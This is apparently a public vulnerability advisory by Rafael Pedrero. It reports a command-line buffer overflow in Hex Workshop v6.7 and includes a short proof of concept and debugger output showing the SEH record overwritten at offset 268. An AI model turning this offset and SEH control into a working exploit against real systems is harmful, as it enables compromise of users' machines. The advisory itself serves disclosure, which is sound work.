# Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS  
# Discovery by: Rafael Pedrero  
# Discovery Date: 2022-01-06  
# Vendor Homepage:,  
# Software Link :,  
# Tested Version: v6.7  
# Tested on: Windows 10  
CVSS v3: 7.3  
CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H  
CWE: CWE-119  
Hex Workshop v6.7 is vulnerable to denial of service via a command line  
file arguments and control the Structured Exception Handler (SEH) records.  
Proof of concept:  
Open HWorks32.exe from command line with a large string in Arguments, more  
than 268 chars:  
File 'C:\Hex Workshop\HWorks32.exe'  
0BADF00D [+] Examining SEH chain  
0BADF00D SEH record (nseh field) at 0x0089e63c overwritten with  
unicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclic  
data after the handler  
The application crash.